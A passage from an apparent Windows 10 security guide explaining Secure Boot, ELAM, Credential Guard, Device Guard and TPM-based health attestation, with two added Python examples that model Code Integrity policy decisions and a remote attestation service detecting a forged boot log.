Naturally, the Microsoft certificate used to digitally sign the Windows 10 OS loaders is in that store, which
allows UEFI to validate the certificate as part of its security policy. Secure Boot must be enabled by default
on all computers that are certified for Windows 10 under the Windows Hardware Compatibility Program.
Secure Boot is a UEFI firmware-based feature, which allows for the signing and verification of critical boot
files and drivers at boot time. Secure Boot checks signature values of the Windows Boot Manager, BCD
store, Windows OS loader file, and other boot critical DLLs at boot time before the system is allowed to fully
boot into a usable operating system by using policies that are defined by the OEM at build time. Secure
Boot prevents many types of boot-based rootkit, malware, and other security-related attacks against the
Windows platform. Secure Boot protects the operating system boot process whether booting from local
hard disk, USB, PXE, or DVD, or into full Windows or Windows Recovery Environment (RE). Secure Boot
protects the boot environment of a Windows 10 installation by verifying the signatures of the critical boot
components to confirm malicious activity did not compromise them. Secure Boot protection ends after the
Windows kernel file (ntoskrnl.exe) has been loaded.

Note: Secure Boot protects the platform until the Windows kernel is loaded. Then protections like
ELAM take over.

Secure Boot configuration policy. Extends Secure Boot functionality to critical Windows 10
configuration.
Examples of protected configuration information include protecting the Disable Execute bit (NX option) or
ensuring that the test signing policy (code integrity) cannot be enabled. This ensures that the binaries and
configuration of the computer can be trusted after the boot process has completed. Secure Boot
configuration policy does this with UEFI policy. These policies are signed in the same way that operating
system binaries are signed for use with Secure Boot.
The Secure Boot configuration policy must be signed by a private key that corresponds to one of the public
keys stored in the Key Exchange Key (KEK) list. The Microsoft Certificate Authority (CA) will be present in the
KEK list of all Windows certified Secure Boot systems. By default, a policy signed by the Microsoft KEK will
work on all Secure Boot systems. BootMgr must verify the signature against the KEK list before applying
a signed policy. With Windows 10, the default Secure Boot configuration policy is embedded in bootmgr.
The bootloader verifies the digital signature of the Windows 10 kernel before loading it. The Windows 10
kernel, in turn, verifies every other component of the Windows startup process, including the boot drivers,
startup files, and the ELAM component. This step is important and protects the rest of the boot process by
verifying that all Windows boot components have integrity and can be trusted.
Early Launch Antimalware (ELAM). ELAM tests all drivers before they load and prevents unapproved
drivers from loading.
Traditional antimalware apps don’t start until after the boot drivers have been loaded, which gives a rootkit
that is disguised as a driver the opportunity to work. ELAM is a Windows mechanism introduced in a
previous version of Windows that allows antimalware software to run very early in the boot sequence. Thus,
the antimalware component is the first third-party component to run and control the initialization of other
boot drivers until the Windows operating system is operational. When the system is started with a complete
runtime environment (network access, storage, and so on), then a full-featured antimalware is loaded.
ELAM can load a Microsoft or non-Microsoft antimalware driver before all non-Microsoft boot drivers and
applications, thus continuing the chain of trust established by Secure Boot and Trusted Boot. Because the
operating system hasn’t started yet, and because Windows needs to boot as quickly as possible, ELAM has a
simple task: Examine every boot driver and determine whether it is on the list of trusted drivers. If it’s not
trusted, Windows won’t load it.

Note: Windows Defender, Microsoft's antimalware included by default in Windows 10, supports ELAM;
it can be replaced with a third-party antimalware compatible solution. The name of the Windows
Defender ELAM driver is WdBoot.sys. Windows Defender in Windows 10 uses its ELAM driver to roll
back any malicious changes made to the Windows Defender driver at the next reboot. This prevents
kernel mode malware making lasting changes to Windows Defender’s mini-filter driver before
shutdown or reboot.

The ELAM signed driver is loaded before any other third-party drivers or applications, which allows the
antimalware software to detect and block any attempts to tamper with the boot process by trying to load
unsigned or untrusted code.
The ELAM driver is a small driver with a small policy database that has a very narrow scope, focused on
drivers that are loaded early at system launch. The policy database is stored in a registry hive that is also
measured to the TPM, to record the operational parameters of the ELAM driver. An ELAM driver must be
signed by Microsoft and the associated certificate must contain the complementary EKU
(1.3.6.1.4.1.311.61.4.1).
Virtualization-based security (Hyper-V + Secure Kernel). Virtualization-based security is a completely
new enforced security boundary that allows you to protect critical parts of Windows 10.
Virtualization-based security isolates sensitive code like Kernel Mode Code Integrity or sensitive corporate
domain credentials from the rest of the Windows operating system. For more information, refer to the
Virtualization-based security section.
Hypervisor-protected Code Integrity (HVCI). Hypervisor-protected Code Integrity is a feature of Device
Guard that ensures only drivers, executables, and DLLs that comply with the Device Guard Code Integrity
policy are allowed to run.
When enabled and configured, Windows 10 can start the Hyper-V virtualization-based security services.
HVCI helps protect the system core (kernel), privileged drivers, and system defenses, like antimalware
solutions, by preventing malware from running early in the boot process, or after startup.
HVCI uses virtualization-based security to isolate Code Integrity, so the only way kernel memory can become
executable is through a Code Integrity verification. This means that kernel memory pages can never be
Writable and Executable (W+X) and executable code cannot be directly modified.

Note: Device Guard devices that run Kernel Mode Code Integrity with virtualization-based security
must have compatible drivers. For additional information, please read the Driver compatibility with
Device Guard in Windows 10 blog post.

The Device Guard Code Integrity feature lets organizations control what code is trusted to run into the
Windows kernel and what applications are approved to run in user mode. It’s configurable by using a policy.
Device Guard Code Integrity policy is a binary file that Microsoft recommends you sign. The signing of the
Code Integrity policy aids in the protection against a malicious user with Administrator privileges trying to
modify or remove the current Code Integrity policy.
Credential Guard. Credential Guard protects corporate credentials with hardware-based credential
isolation.
In Windows 10, Credential Guard aims to protect domain corporate credentials from theft and reuse by
malware. With Credential Guard, Windows 10 implemented an architectural change that fundamentally
prevents the current forms of the pass-the-hash (PtH) attack.
This is accomplished by leveraging Hyper-V and the new virtualization-based security feature to create a
protected container where trusted code and secrets are isolated from the Windows kernel. That means that
even if the Windows kernel is compromised an attacker has no way to read and extract the data required to
initiate a PtH attack. Credential Guard prevents this because the memory where secrets are stored is no
longer accessible from the regular OS, even in kernel mode - the hypervisor controls who can access the
memory.
Health attestation. The device’s firmware logs the boot process, and Windows 10 can send it to a trusted
server that can check and assess the device’s health.
Windows 10 takes measurements of the UEFI firmware and of each of the Windows and antimalware
components as they load during the boot process. Additionally, the measurements are taken
sequentially, not all at once. When these measurements are complete, their values are recorded in the TPM's
platform configuration registers (PCRs), where they cannot be changed unless the system is reset.
For more information, see Secured Boot and Measured Boot: Hardening Early Boot Components Against
Malware.
During each subsequent boot, the same components are measured, which allows comparison of the
measurements against an expected baseline. For additional security, the values measured by the TPM can be
signed and transmitted to a remote server, which can then perform the comparison. This process, called
remote device health attestation, allows the server to verify health status of the Windows device.
Although Secure Boot is a proactive form of protection, health attestation is a reactive form of boot
protection. Health attestation ships disabled in Windows and is enabled by an antimalware or an MDM
vendor. Unlike Secure Boot, health attestation will not stop the boot process and enter remediation when a
measurement fails. But with conditional access control, health attestation will help to prevent access to
high-value assets.
Virtualization-based security
Virtualization-based security provides a new trust boundary for Windows 10 and leverages Hyper-V hypervisor
technology to enhance platform security. Virtualization-based security provides a secure execution environment to
run specific Windows trusted code (trustlet) and to protect sensitive data.
Virtualization-based security helps to protect against a compromised kernel or a malicious user with Administrator
privileges. Note that virtualization-based security is not trying to protect against a physical attacker.
The following Windows 10 services are protected with virtualization-based security:
Credential Guard (LSA Credential Isolation): prevents pass-the-hash attacks and enterprise credential theft
that happens by reading and dumping the content of lsass memory
Device Guard (Hyper-V Code Integrity): Device Guard uses the new virtualization-based security in Windows
10 to isolate the Code Integrity service from the Windows kernel itself, which lets the service use signatures
defined by your enterprise-controlled policy to help determine what is trustworthy. In effect, the Code Integrity
service runs alongside the kernel in a Windows hypervisor-protected container.
Other isolated services: for example, on Windows Server 2016, there is the vTPM feature that allows you to
have encrypted virtual machines (VMs) on servers.

Note: Virtualization-based security is only available with Windows 10 Enterprise. Virtualization-based security
requires devices with UEFI (2.3.1 or higher) with Secure Boot enabled and an x64 processor with Virtualization
Extensions and SLAT enabled. IOMMU, TPM 2.0, and support for Secure Memory Overwrite are optional,
but recommended.

The schema below is a high-level view of Windows 10 with virtualization-based security.

Credential Guard
In Windows 10, when Credential Guard is enabled, Local Security Authority Subsystem Service (lsass.exe) runs
sensitive code in an Isolated user mode to help protect data from malware that may be running in the normal user
mode. This helps ensure that protected data is not stolen and reused on remote machines, which mitigates many
PtH-style attacks.
Credential Guard helps protect credentials by encrypting them with either a per-boot or persistent key:
The per-boot key is used for any in-memory credentials that do not require persistence. An example of such a
credential would be a ticket-granting ticket (TGT) session key. This key is negotiated with a Key Distribution
Center (KDC) every time authentication occurs and is protected with a per-boot key.
The persistent key, or some derivative, is used to help protect items that are stored and reloaded after a
reboot. Such protection is intended for long-term storage, and must be protected with a consistent key.
Credential Guard is activated by a registry key and then enabled by using a UEFI variable. This is done to
protect against remote modifications of the configuration. The use of a UEFI variable implies that physical
access is required to change the configuration. When lsass.exe detects that credential isolation is enabled, it then
spawns LsaIso.exe as an isolated process, which ensures that it runs within isolated user mode. The startup of
LsaIso.exe is performed before initialization of a security support provider, which ensures that the secure mode
support routines are ready before any authentication begins.
Device Guard
Device Guard is a new feature of Windows 10 Enterprise that allows organizations to lock down a device to help
protect it from running untrusted software. In this configuration, the only applications allowed to run are those that
are trusted by the organization.
The trust decision to execute code is performed by using Hyper-V Code Integrity, which runs in
virtualization-based security, a Hyper-V protected container that runs alongside regular Windows.
Hyper-V Code Integrity is a feature that validates the integrity of a driver or system file each time it is loaded into
memory. Code integrity detects whether an unsigned driver or system file is being loaded into the kernel, or
whether a system file has been modified by malicious software that is being run by a user account with
Administrator privileges. On x64-based versions of Windows 10, kernel-mode drivers must be digitally signed.

Note: Independent of whether a Device Guard policy is activated, Windows 10 by default raises the bar for what
runs in the kernel. Windows 10 drivers must be signed by Microsoft, and more specifically, by the WHQL
(Windows Hardware Quality Labs) portal. Additionally, starting in October 2015, the WHQL portal will only accept
driver submissions, including both kernel and user mode driver submissions, that have a valid Extended
Validation (“EV”) Code Signing Certificate.

With Device Guard in Windows 10, organizations are now able to define their own Code Integrity policy for use on
x64 systems running Windows 10 Enterprise. Organizations have the ability to configure the policy that determines
what is trusted to run. These include drivers and system files, as well as traditional desktop applications and scripts.
The system is then locked down to only run applications that the organization trusts.
Device Guard is a built-in feature of Windows 10 Enterprise that prevents the execution of unwanted code and
applications. Device Guard can be configured using two rule actions - allow and deny:
Allow limits execution of applications to an allowed list of code or trusted publisher and blocks everything else.
Deny completes the allow trusted publisher approach by blocking the execution of a specific application.
At the time of this writing, and according to Microsoft’s latest research, more than 90 percent of malware is
completely unsigned. So implementing a basic Device Guard policy can simply and effectively help block the vast
majority of malware. In fact, Device Guard has the potential to go further, and can also help block signed malware.
Device Guard needs to be planned and configured to be truly effective. It is not just a protection that is enabled or
disabled. Device Guard is a combination of hardware security features and software security features that, when
configured together, can lock down a computer to help ensure the most secure and resistant system possible.
There are three different parts that make up the Device Guard solution in Windows 10:
The first part is a base set of hardware security features introduced with the previous version of Windows.
TPM for hardware cryptographic operations and UEFI with modern firmware, along with Secure Boot, allows
you to control what the device is running when the systems start.
The second part is the code integrity engine. In Windows 10, Code Integrity is now fully configurable and
now resides in Isolated user mode, a part of the memory that is protected by virtualization-based security.
The last part of Device Guard is manageability. Code Integrity configuration is exposed through specific
Group Policy Objects, PowerShell cmdlets, and MDM configuration service providers (CSPs).
For more information on how to deploy Device Guard in an enterprise, see the Device Guard deployment guide.
Device Guard scenarios
As previously described, Device Guard is a powerful way to lock down systems. Device Guard is not intended to be
used broadly and it may not always be applicable, but there are some high-interest scenarios.
Device Guard is useful and applicable on fixed-workload systems like cash registers, kiosk machines, Secure
Admin Workstations (SAWs), or well-managed desktops. Device Guard is highly relevant on systems that run a
well-defined set of software that does not change too frequently. It could also help protect Information Workers
(IWs) beyond just SAWs, as long as what they need to run is known and the set of applications is not going to
change on a daily basis.
SAWs are computers that are built to help significantly reduce the risk of compromise from malware, phishing
attacks, bogus websites, and PtH attacks, among other security risks. Although SAWs can’t be considered a “silver
bullet” security solution to these attacks, these types of clients are helpful as part of a layered, defense-in-depth
approach to security.
To protect high-value assets, SAWs are used to make secure connections to those assets.
Similarly, on corporate fully-managed workstations, where applications are installed by using a distribution tool
like System Center Configuration Manager, Intune, or any third-party device management, Device Guard is very
applicable. In that type of scenario, the organization has a good idea of the software that an average user is
running.
It could be challenging to use Device Guard on corporate, lightly-managed workstations where the user is typically
allowed to install software on their own. When an organization offers great flexibility, it’s quite difficult to run
Device Guard in enforcement mode. Nevertheless, Device Guard can be run in Audit mode, and in that case, the
event log will contain a record of any binaries that violated the Device Guard policy. When Device Guard is used in
Audit mode, organizations can get rich data about drivers and applications that users install and run.
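To make the allow/deny rule actions described earlier and the Audit-versus-enforcement distinction concrete, here is an added Python model of a Code Integrity policy decision. It is example code written for this page, not Microsoft's policy engine or the real binary-encoded XML policy format; it reduces a policy to three rule sets (allowed publishers, allowed file hashes, denied file hashes), and the publisher names, file paths, and file contents are constructed for the demo.

```python
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass
class Binary:
    path: str
    publisher: Optional[str]   # None models an unsigned file
    content: bytes

    @property
    def sha256(self) -> str:
        return hashlib.sha256(self.content).hexdigest()


@dataclass
class CIPolicy:
    """Simplified Code Integrity policy (an assumption for this demo, not the real schema):
    allow by signing publisher or by file hash, deny by file hash, optional audit mode."""
    allowed_publishers: Set[str]
    allowed_hashes: Set[str] = field(default_factory=set)
    denied_hashes: Set[str] = field(default_factory=set)
    audit_mode: bool = False


def evaluate(policy: CIPolicy, binary: Binary) -> Dict[str, object]:
    """Decide whether a file may run. Deny rules take precedence over allow rules, and anything
    not explicitly allowed is blocked, so unsigned code is blocked without any special rule."""
    digest = binary.sha256
    if digest in policy.denied_hashes:
        verdict, reason = "deny", "explicit deny rule for this file hash"
    elif digest in policy.allowed_hashes:
        verdict, reason = "allow", "file hash on allow list"
    elif binary.publisher in policy.allowed_publishers:
        verdict, reason = "allow", f"signed by trusted publisher {binary.publisher}"
    elif binary.publisher is None:
        verdict, reason = "deny", "unsigned"
    else:
        verdict, reason = "deny", f"publisher {binary.publisher} not trusted"
    # In Audit mode a violation is recorded (an event) but the file still executes.
    return {"path": binary.path, "verdict": verdict, "reason": reason,
            "executes": verdict == "allow" or policy.audit_mode,
            "audit_event": verdict == "deny" and policy.audit_mode}


def audit_report(policy: CIPolicy, binaries: List[Binary]) -> List[str]:
    """What an Audit-mode rollout yields: the files that would be blocked once enforcement is on."""
    return [r["path"] for r in (evaluate(policy, b) for b in binaries) if r["verdict"] == "deny"]


# Constructed sample files; publisher names, paths and contents are invented for the demo.
SAMPLES = [
    Binary(r"C:\Program Files\LOB\inventory.exe", "CN=Contoso LOB Signing", b"inventory v1"),
    Binary(r"C:\Users\alice\Downloads\setup.exe", None, b"unsigned installer"),
    Binary(r"C:\Tools\oldadmin.exe", "CN=Contoso LOB Signing", b"known-bad build"),
    Binary(r"C:\Windows\System32\notepad.exe", "CN=Microsoft Windows", b"notepad"),
]
# Allow two publishers, but deny one specific signed build from a trusted publisher.
POLICY = CIPolicy(allowed_publishers={"CN=Microsoft Windows", "CN=Contoso LOB Signing"},
                  denied_hashes={SAMPLES[2].sha256})

if __name__ == "__main__":
    for sample in SAMPLES:
        print(evaluate(POLICY, sample))
    print("would be blocked in enforcement:", audit_report(POLICY, SAMPLES))
```

The deny rule on a specific hash illustrates how a signed but unwanted build is blocked even though its publisher is trusted, and `audit_report` is the list an administrator reviews before switching a lightly-managed fleet from Audit mode to enforcement.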
Before you can benefit from the protection included in Device Guard, Code Integrity policy must be created by
using tools provided by Microsoft, but the policy can be deployed with common management tools, like Group
Policy. The Code Integrity policy is a binary-encoded XML document that includes configuration settings for both
the User and Kernel-modes of Windows 10, along with restrictions on Windows 10 script hosts. Device Guard
Code Integrity policy restricts what code can run on a device.

Note: Device Guard policy can be signed in Windows 10, which adds additional protection against
administrative users changing or removing this policy.

Signed Device Guard policy offers stronger protection against a malicious local administrator trying to defeat
Device Guard.
When the policy is signed, the GUID of the policy is stored in a UEFI pre-OS secure variable which offers
tampering protection. The only way to update the Device Guard policy subsequently is to provide a new version of
the policy signed by the same signer or from a signer specified as part of the Device Guard policy into the
UpdateSigner section.
The importance of signing applications
On computers with Device Guard, Microsoft proposes to move from a world where unsigned apps can be run
without restriction to a world where only signed and trusted code is allowed to run on Windows 10.
With Windows 10, organizations will make line-of-business (LOB) apps available to members of the organization
through the Microsoft Store infrastructure. More specifically, LOB apps will be available in a private store within the
public Microsoft Store. Microsoft Store signs and distributes Universal Windows apps and Classic Windows apps.
All apps downloaded from the Microsoft Store are signed.
In organizations today, the vast majority of LOB applications are unsigned. Code signing is frequently viewed as a
tough problem to solve for a variety of reasons, like the lack of code signing expertise. Even if code signing is a best
practice, a lot of internal applications are not signed.
Windows 10 includes tools that allow IT pros to take applications that have been already packaged and run them
through a process to create additional signatures that can be distributed along with existing applications.
Why are antimalware and device management solutions still necessary?
Although allow-list mechanisms are extremely efficient at ensuring that only trusted applications can be run, they
cannot prevent the compromise of a trusted (but vulnerable) application by malicious content designed to exploit a
known vulnerability. Device Guard doesn’t protect against user mode malicious code that runs by exploiting
vulnerabilities.
Vulnerabilities are weaknesses in software that could allow an attacker to compromise the integrity, availability, or
confidentiality of the device. Some of the worst vulnerabilities allow attackers to exploit the compromised device by
causing it to run malicious code without the user’s knowledge.
It’s common to see attackers distributing specially crafted content in an attempt to exploit known vulnerabilities in
user mode software like web browsers (and their plug-ins), Java virtual machines, PDF readers, or document
editors. As of today, 90 percent of discovered vulnerabilities affect user mode applications compared to the
operating system and kernel mode drivers that host them.
To combat these threats, patching is the single most effective control, with antimalware software forming
complementary layers of defense.
Most application software has no facility for updating itself, so even if the software vendor publishes an update that
fixes the vulnerability, the user may not know that the update is available or how to obtain it, and therefore remains
vulnerable to attack. Organizations still need to manage devices and to patch vulnerabilities.
MDM solutions are becoming prevalent as a light-weight device management technology. Windows 10 extends
the management capabilities that have become available for MDMs. One key feature Microsoft has added to
Windows 10 is the ability for MDMs to acquire a strong statement of device health from managed and registered
devices.
Device health attestation
Device health attestation leverages the TPM to provide cryptographically strong and verifiable measurements of
the chain of software used to boot the device.
For Windows 10-based devices, Microsoft introduces a new public API that will allow MDM software to access a
remote attestation service called Windows Health Attestation Service. A health attestation result, in addition with
other elements, can be used to allow or deny access to networks, apps, or services, based on whether devices prove
to be healthy.
For more information on device health attestation, see the Detect an unhealthy Windows 10-based device section.
Hardware requirements
The following table details the hardware requirements for both virtualization-based security services and the health
attestation feature. For more information, see Minimum hardware requirements.
HARDWARE / MOTIVATION

Hardware: UEFI 2.3.1 or later firmware with Secure Boot enabled
Motivation: Required to support UEFI Secure Boot. UEFI Secure Boot ensures that the device boots only
authorized code. Additionally, Boot Integrity (Platform Secure Boot) must be supported following the
requirements in Hardware Compatibility Specification for Systems for Windows 10 under the subsection
“System.Fundamentals.Firmware.CS.UEFISecureBoot.ConnectedStandby”.

Hardware: Virtualization extensions, such as Intel VT-x, AMD-V, and SLAT must be enabled
Motivation: Required to support virtualization-based security.
Note: Device Guard can be enabled without using virtualization-based security.

Hardware: X64 processor
Motivation: Required to support virtualization-based security that uses Windows Hypervisor. Hyper-V is
supported only on x64 processors (and not on x86). Direct Memory Access (DMA) protection can be enabled
to provide additional memory protection but requires processors to include DMA protection technologies.

Hardware: IOMMU, such as Intel VT-d, AMD-Vi
Motivation: Support for the IOMMU in Windows 10 enhances system resiliency against DMA attacks.

Hardware: Trusted Platform Module (TPM)
Motivation: Required to support health attestation and necessary for additional key protections for
virtualization-based security. TPM 2.0 is supported. Support for TPM 1.2 was added beginning in Windows 10,
version 1607 (RS1).

This section presented information about several closely related controls in Windows 10. The multi-layer,
defense-in-depth approach helps to eradicate low-level malware during the boot sequence. Virtualization-based security is
a fundamental operating system architecture change that adds a new security boundary. Device Guard and
Credential Guard respectively help to block untrusted code and protect corporate domain credentials from theft
and reuse. This section also briefly discussed the importance of managing devices and patching vulnerabilities. All
these technologies can be used to harden and lock down devices while limiting the risk of attackers compromising
them.

Detect an unhealthy Windows 10-based device


As of today, many organizations only consider devices to be compliant with company policy after they’ve passed a
variety of checks that show, for example, that the operating system is in the correct state, properly configured, and
has security protection enabled. Unfortunately, with today’s systems, this form of reporting is not entirely reliable
because malware can spoof a software statement about system health. A rootkit, or a similar low-level exploit, can
report a false healthy state to traditional compliance tools.
The biggest challenge with rootkits is that they can be undetectable to the client. Because they start before
antimalware, and they have system-level privileges, they can completely disguise themselves while continuing to
access system resources. As a result, traditional computers infected with rootkits appear to be healthy, even with
antimalware running.
As previously discussed, the health attestation feature of Windows 10 uses the TPM hardware component to
securely record a measurement of every boot-related component, including firmware, Windows 10 kernel, and
even early boot drivers. Because health attestation leverages the hardware-based security capabilities of the TPM,
the log of all measured boot components remains out of the reach of any malware.
By attesting a trusted boot state, devices can prove that they are not running low-level malware that could spoof
later compliance checks. TPM-based health attestation provides a reliable anchor of trust for assets that contain
high-value data.
What is the concept of device health?
To understand the concept of device health, it’s important to know traditional measures that IT pros have taken to
prevent the breach of malware. Malware control technologies are highly focused on the prevention of installation
and distribution.
However, the use of traditional malware prevention technologies like antimalware or patching solutions brings a
new set of issues for IT pros: the ability to monitor and control the compliance of devices accessing organization’s
resources.
The definition of device compliance will vary based on an organization’s installed antimalware, device configuration
settings, patch management baseline, and other security requirements. But health of the device is part of the
overall device compliance policy.
The health of the device is not binary and depends on the organization’s security implementation. The Health
Attestation Service provides information back to the MDM on which security features were enabled during the boot
of the device by leveraging the trustworthy hardware TPM.
But health attestation only provides information, which is why an MDM solution is needed to take and enforce a
decision.
Remote device health attestation
In Windows 10, health attestation refers to a feature where Measured Boot data generated during the boot process
is sent to a remote device health attestation service operated by Microsoft.
This is the most secure approach available for Windows 10-based devices to detect when security defenses are
down. During the boot process, the TCG log and PCR values are sent to a remote Microsoft cloud service. Logs
are then checked by the Health Attestation Service to determine what changes have occurred on the device.
A relying party like an MDM can inspect the report generated by the remote health attestation service.

Note: To use the health attestation feature of Windows 10, the device must be equipped with a discrete or
firmware TPM. There is no restriction on any particular edition of Windows 10.

Windows 10 supports health attestation scenarios by allowing applications access to the underlying health
attestation configuration service provider (CSP) so that applications can request a health attestation token. The
measurement of the boot sequence can be checked at any time locally by an antimalware or an MDM agent.
Remote device health attestation combined with an MDM provides a hardware-rooted method for reporting the
current security status and detecting any changes, without having to trust the software running on the system.
In the case where malicious code is running on the device, the use of a remote server is required. If a rootkit is
present on the device, the antimalware is no longer reliable, and its behavior can be hijacked by malicious code
running early in the startup sequence. That's why it's important to use Secure Boot and Device Guard, to control
which code is loaded during the boot sequence.
The antimalware software can search to determine whether the boot sequence contains any signs of malware, such
as a rootkit. It can also send the TCG log and the PCRs to a remote health attestation server to provide a separation
between the measurement component and the verification component.
Health attestation logs the measurements in various TPM Platform Configuration Registers (PCRs) and TCG logs
during the boot process.

When starting a device equipped with TPM, a measurement of different components is performed. This includes
firmware, UEFI drivers, CPU microcode, and also all the Windows 10 drivers whose type is Boot Start. The raw
measurements are stored in the TPM PCR registers while the details of all events (executable path, authority
certification, and so on) are available in the TCG log.
The health attestation process works as follows:
1. Hardware boot components are measured.
2. Operating system boot components are measured.
3. If Device Guard is enabled, current Device Guard policy is measured.
4. Windows kernel is measured.
5. Antivirus software is started as the first kernel mode driver.
6. Boot start drivers are measured.
7. MDM server through the MDM agent issues a health check command by leveraging the Health Attestation
CSP.
8. Boot measurements are validated by the Health Attestation Service.

Note: By default, the last 100 system boot logs and all associated resume logs are archived in the
%SystemRoot%\logs\measuredboot folder. The number of retained logs may be set with the registry
REG_DWORD value PlatformLogRetention under the
HKLM\SYSTEM\CurrentControlSet\Services\TPM key. A value of 0 will turn off log archival and a value
of 0xffffffff will keep all logs.

The following process describes how health boot measurements are sent to the health attestation service:
1. The client (a Windows 10-based device with TPM) initiates the request with the remote device health attestation
service. Because the health attestation server is expected to be a Microsoft cloud service, the URI is already
pre-provisioned in the client.
2. The client then sends the TCG log, the AIK signed data (PCR values, boot counter) and the AIK certificate
information.
3. The remote device health attestation service then:
a. Verifies that the AIK certificate is issued by a known and trusted CA and the certificate is valid and not
revoked.
b. Verifies that the signature on the PCR quotes is correct and consistent with the TCG log value.
c. Parses the properties in the TCG log.
d. Issues the device health token that contains the health information, the AIK information, and the boot
counter information. The health token also contains a valid issuance time. The device health token is
encrypted and signed, which means that the information is protected and only accessible to the issuing health
attestation service.
4. The client stores the encrypted health blob in its local store. The device health token contains device health
status, a device ID (the Windows AIK), and the boot counter.
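The four-step exchange above, as an added example that is not code from Windows or the Health Attestation Service: a Python model with both sides of the conversation, the client side (measured boot into PCRs, TCG log, AIK-signed quote carrying the boot counter) and the service side (AIK certificate check against a trusted CA and a revocation list, quote signature check, log replay against the quoted PCRs, property parsing, signed health token). The keys, event names, PCR assignments and required-property list are assumptions for an offline demo, and HMAC-SHA256 stands in for the TPM's asymmetric AIK signature and the CA and service signatures; encryption of the token is omitted.

```python
import hashlib, hmac, json, time
from typing import Dict, List, Tuple


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM PCR extend: PCR := H(PCR || digest). Values only accumulate; nothing can be rewound."""
    return sha256(pcr + digest)


def sign(key: bytes, obj: dict) -> str:
    # Stand-in (assumption) for the asymmetric AIK / CA / service signatures: HMAC-SHA256 over
    # canonical JSON. A real AIK quote is an RSA signature produced inside the TPM.
    return hmac.new(key, json.dumps(obj, sort_keys=True).encode(), "sha256").hexdigest()


# ---------------- client side: the Windows device ----------------
def measured_boot(events: List[Tuple[int, str, bytes]]) -> Tuple[Dict[int, bytes], List[dict]]:
    """Measure each (pcr_index, event_name, data) into its PCR and record it in the TCG log."""
    pcrs = {i: bytes(32) for i in range(24)}            # every PCR is zero at power-on
    tcg_log = []
    for idx, name, data in events:
        digest = sha256(data)
        pcrs[idx] = extend(pcrs[idx], digest)
        tcg_log.append({"pcr": idx, "event": name, "digest": digest.hex()})
    return pcrs, tcg_log


def build_request(aik_key: bytes, aik_cert: dict, pcrs: Dict[int, bytes],
                  tcg_log: List[dict], boot_counter: int) -> dict:
    """Step 2: TCG log, AIK-signed quote (PCR values + boot counter) and the AIK certificate."""
    quote = {"pcrs": {str(i): v.hex() for i, v in pcrs.items()}, "boot_counter": boot_counter}
    return {"tcg_log": tcg_log, "quote": quote, "quote_sig": sign(aik_key, quote), "aik_cert": aik_cert}


# ---------------- service side: remote health attestation ----------------
class HealthAttestationService:
    REQUIRED_EVENTS = ("secure_boot=on", "ci_policy=enforced", "elam_driver")   # constructed names

    def __init__(self, ca_key: bytes, token_key: bytes, revoked=()):
        self.ca_key, self.token_key, self.revoked = ca_key, token_key, set(revoked)

    def attest(self, req: dict) -> dict:
        cert = req["aik_cert"]
        body = {k: v for k, v in cert.items() if k != "ca_sig"}
        # 3a. AIK certificate issued by the trusted CA and not revoked.
        if cert["aik_id"] in self.revoked or not hmac.compare_digest(cert["ca_sig"], sign(self.ca_key, body)):
            return self._token(req, False, "AIK certificate untrusted or revoked")
        # 3b. Quote signature correct, and consistent with the TCG log (replay the log).
        aik_key = bytes.fromhex(cert["aik_key"])         # would be the AIK public key in reality
        if not hmac.compare_digest(req["quote_sig"], sign(aik_key, req["quote"])):
            return self._token(req, False, "quote signature invalid")
        replay = {i: bytes(32) for i in range(24)}
        for e in req["tcg_log"]:
            replay[e["pcr"]] = extend(replay[e["pcr"]], bytes.fromhex(e["digest"]))
        if {str(i): v.hex() for i, v in replay.items()} != req["quote"]["pcrs"]:
            return self._token(req, False, "TCG log does not reproduce the quoted PCRs")
        # 3c. Parse the log properties the health policy cares about.
        seen = {e["event"] for e in req["tcg_log"]}
        missing = [p for p in self.REQUIRED_EVENTS if p not in seen]
        return self._token(req, not missing, ("missing: " + ", ".join(missing)) if missing else "ok")

    def _token(self, req: dict, healthy: bool, reason: str) -> dict:
        # 3d. Health token: status, AIK identity, boot counter, issuance time; signed by the service.
        tok = {"healthy": healthy, "reason": reason, "aik_id": req["aik_cert"]["aik_id"],
               "ek_backed": req["aik_cert"].get("ek_backed", False),
               "boot_counter": req["quote"]["boot_counter"], "issued_at": int(time.time())}
        return {"token": tok, "sig": sign(self.token_key, tok)}


def verify_token(token_key: bytes, blob: dict) -> bool:
    """What a relying party does with the stored blob before acting on its contents."""
    return hmac.compare_digest(blob["sig"], sign(token_key, blob["token"]))


# ---------------- constructed scenarios ----------------
CA_KEY, TOKEN_KEY, AIK_KEY = b"demo-ca-key", b"demo-token-key", b"demo-aik-key"
GOOD_BOOT = [(0, "crtm:firmware", b"uefi-fw-1.2"), (7, "secure_boot=on", b"1"),
             (4, "bootmgr", b"bootmgfw"), (11, "ci_policy=enforced", b"policy-v3"),
             (4, "ntoskrnl", b"kernel"), (4, "elam_driver", b"wdboot")]


def make_cert(aik_id: str, ek_backed: bool) -> dict:
    body = {"aik_id": aik_id, "aik_key": AIK_KEY.hex(), "ek_backed": ek_backed}
    return dict(body, ca_sig=sign(CA_KEY, body))


def run_scenarios() -> Dict[str, dict]:
    svc, cert = HealthAttestationService(CA_KEY, TOKEN_KEY), make_cert("aik-0001", ek_backed=True)
    results = {}
    pcrs, log = measured_boot(GOOD_BOOT)
    results["healthy"] = svc.attest(build_request(AIK_KEY, cert, pcrs, log, boot_counter=42))
    # A modified kernel was really loaded; the log entry is rewritten to look clean, but PCR[4]
    # cannot be rewound, so the service's replay no longer matches the signed quote.
    tampered = [e if e[1] != "ntoskrnl" else (4, "ntoskrnl", b"kernel+rootkit") for e in GOOD_BOOT]
    pcrs, log = measured_boot(tampered)
    log[4]["digest"] = sha256(b"kernel").hex()
    results["forged_log"] = svc.attest(build_request(AIK_KEY, cert, pcrs, log, boot_counter=43))
    # Secure Boot off: log and PCRs are consistent, but the property check fails.
    sb_off = [e if e[1] != "secure_boot=on" else (7, "secure_boot=off", b"0") for e in GOOD_BOOT]
    pcrs, log = measured_boot(sb_off)
    results["secure_boot_off"] = svc.attest(build_request(AIK_KEY, cert, pcrs, log, boot_counter=44))
    return results
```

The second scenario is the point of separating measurement from verification: editing the log is easy for code running early in boot, but the quoted PCR values are signed by the AIK inside the TPM, so a log that no longer replays to them is rejected without the service ever trusting software on the device.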

Device health attestation components


The device health attestation solution involves different components that are TPM, Health Attestation CSP, and the
